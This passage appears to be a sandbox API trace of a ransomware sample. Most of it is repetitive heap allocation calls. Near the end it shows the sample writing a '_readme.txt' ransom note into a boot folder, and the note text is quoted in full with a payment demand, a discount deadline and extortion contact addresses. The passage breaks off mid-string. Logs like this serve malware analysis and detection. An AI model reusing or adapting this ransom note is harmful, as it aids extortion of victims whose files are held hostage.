(HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.739] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.740] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.740] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.741] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.741] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc2e) returned 0x3b78058 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.742] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.742] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.743] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.743] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x860) returned 0x3b78058 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.744] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.744] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0xc46) returned 0x3b78058 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x840) returned 0x3466cb0 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x830) returned 0x3466cb0 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.745] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.745] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x20) returned 0x33fd4c8 [0228.746] RtlAllocateHeap (HeapHandle=0x620000, Flags=0x0, Size=0x820) returned 0x3466cb0 [0228.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3466cb0 | out: hHeap=0x620000) returned 1 [0228.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.746] PathFindFileNameW (pszPath="C:\\Boot\\zh-TW\\") returned="zh-TW\\" [0228.746] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0228.746] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd450 | out: hHeap=0x620000) returned 1 [0228.746] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0228.746] PathFindFileNameW (pszPath="") returned="" [0228.746] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x75330000 [0228.746] GetProcAddress (hModule=0x75330000, lpProcName="SHGetFolderPathW") returned 0x753b5708 [0228.746] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3b78058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0228.747] FreeLibrary (hLibModule=0x75330000) returned 1 [0228.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x33fd4c8 | out: hHeap=0x620000) returned 1 [0228.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b78058 | out: hHeap=0x620000) returned 1 [0228.747] HeapFree (in: hHeap=0x620000, dwFlags=0x0, lpMem=0x3b79140 | out: hHeap=0x620000) returned 1 [0228.747] PathAppendW (in: pszPath="C:\\Boot\\zh-TW\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 1 [0228.747] PathFileExistsW (pszPath="C:\\Boot\\zh-TW\\_readme.txt") returned 0 [0228.747] lstrcpyW (in: lpString1=0x3b7b818, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda" [0228.747] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sda", lpString2="A9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-p2ngkyrMRl\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpmanager@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@iran.ir\r\n\r\nYour personal ID:\r\n0201a7d6a8sdaA9GoURN1YjdAQyaC6wsAFQH69tLYb2jZFkNvyct1") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with 